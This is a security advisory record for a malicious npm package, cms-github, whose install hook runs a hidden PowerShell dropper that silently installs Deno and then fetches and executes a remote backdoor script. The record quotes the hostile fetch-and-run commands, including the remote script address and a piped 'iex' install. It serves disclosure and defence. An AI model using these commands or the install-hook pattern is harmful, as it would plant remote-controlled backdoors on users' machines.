VDB
GCVE-110-OSM-2026-5125
GCVE-110-OSM-2026-5125
Advisory PublishedCVSS 8.8/10
Executes a hidden PowerShell dropper at install time that installs scoop, winget, and Deno silently, then fetches and executes a remote Deno backdoor script from `http://77.90.185.225/de2079d13aa5d620.js`. Published by the same author (saihein321@gmail.com) behind confirmed backdoor package cms-helpgit.
**Trigger** (`install`): `node install.js` runs at npm install time on Windows.
**Stage 1 — dropper**: `install.js` writes an embedded PowerShell script to the system temp directory and executes it via `child_process.exec` with `-WindowStyle Hidden -ExecutionPolicy Bypass` and `windowsHide: true`. The script sets execution policy, installs scoop (via `irm get.scoop.sh | iex`, with admin-aware branch), uses scoop to install winget, then installs Deno silently via `winget install --id DenoLand.Deno --silent`.
**Stage 2 — backdoor fetch**: After locating the Deno binary across multiple fallback paths (`LOCALAPPDATA\Microsoft\WinGet\Packages`, `USERPROFILE\scoop`), the script executes `& $deno -A "http://77.90.185.225/de2079d13aa5d620.js"` — fetching and running the remote backdoor payload with full Deno permissions (`-A`).
**Cleanup**: The temp `.ps1` file is deleted after execution.
**Attribution**: publisher `saihein321@gmail.com`; `index.js` identifies itself internally as `cms-helpgit` version `4.2.3`, confirming the two packages share the same codebase.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | cms-github | 4.2.4 (affected) | — |
Browse GCVE Records
73,734 records in the GCVE database · Updated July 18, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.